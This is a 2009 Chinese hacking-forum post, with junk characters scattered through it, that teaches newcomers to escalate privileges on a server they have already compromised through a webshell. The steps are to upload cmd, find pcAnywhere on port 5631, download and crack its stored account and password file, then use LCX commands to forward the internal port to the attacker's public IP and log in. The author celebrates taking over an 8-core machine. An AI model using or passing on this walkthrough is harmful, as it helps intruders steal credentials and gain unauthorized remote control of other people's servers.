|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。8 @8 D& S3 g( X1 J) p
, S) X' C) U; s# ?
提权方法:pcanywhere+LCX4 f3 v9 z$ R4 d& @/ m. ^
" X9 t* s+ a) s b' H! W& ]2 f( R
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。0 x S6 }& u8 Z$ X0 s4 Y0 ^
8 i7 W4 M8 B' ~$ p" T
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
- P. L* B1 D6 g& l/ |4 y" T$ o1 H/ L: `& F/ y
5 X5 q: p* d) w
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。. K8 w# e; K- x8 J1 D
$ ~& G/ d/ T# F& }. _5 B) R/ l7 {
$ n' V9 T: `7 P, q
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。: y# x8 M* E% A, L0 L k! J
7 W9 |; S# h' e" }9 A
7 H8 _/ J( `+ M
6 L9 F- F5 }; `6 _" f( [* m
: ~9 z/ [' X- s' ]* I$ ]& L2 t由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``* A+ c' c3 O3 Y9 g
& i& o" A$ H- I+ C; u8 s4 Z0 E- M. ~2 X6 v: N0 S7 G8 {. e
LCX的用法再简单说下:
- a: o2 V2 m$ m9 Z
( Z4 c3 A$ d; ?9 i% x" b服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
$ {: a" l! o& ]8 [2 q6 _3 Y. w" L8 P7 I7 s- r, ]/ q2 x. H
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)# F- A! |0 j0 G. t7 c! a2 S! h
6 k8 ^/ D( z( @" r7 a9 _由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
, J: p/ o0 g, T0 z顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
; p* q( e0 C: O$ u5 ~" Q
9 D/ d/ t6 Y8 o; r8 B: g
: k/ B# s3 z# z Q6 y2 G* b" K2 G$ r3 g" i
1 ^' U; c$ ]( C1 `6 i呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
: R1 k# c: U! g/ |7 h+ p) C0 p3 C" S1 z5 Q8 y
0 i |+ V* i) d
" s2 N* w7 V, c7 [7 C" Y% j- ~. ~
- \( t# ~" x/ w" s: P) L$ |0 V9 ]我们本地连接试试,输入我们刚破解的账号密码
8 C4 x3 ]/ V! R4 h4 }+ E3 M! y; l; f+ N7 j
# D0 @1 U* }+ D4 g0 ^9 W6 W
呵呵``连接成功,服务器不错,又一个8核^︵^
# a) L }0 ?3 G7 m
! K, t; v" A, ]6 Q3 H" B5 s) W# h
4 ^% D( h8 u7 B/ c6 h( |+ o: i: q q. r
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
